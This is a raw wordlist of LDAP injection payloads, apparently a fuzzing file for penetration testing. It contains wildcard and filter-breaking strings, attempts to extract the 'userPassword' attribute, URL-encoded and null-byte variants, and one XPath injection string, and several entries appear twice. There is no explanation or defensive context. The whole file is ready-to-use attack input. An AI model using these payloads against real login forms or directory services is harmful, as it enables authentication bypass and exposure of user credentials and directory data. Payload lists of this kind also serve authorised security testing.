*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(cn=*
ldap*)(pager=*
ldap%2A%29%28pager%3D%2A
ldap*)cn=*
ldap%2A%29%28cn%3D%2A
ldap*)(otp=*
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
manager*
ldap*
admin*)((|userpassword=*)
manager*)((|userpassword=*)
ldap*)((|userpassword=*)
admin*)((|userPassword=*)
manager*)((|userPassword=*)
ldap*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
)(cn=))\x00
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*
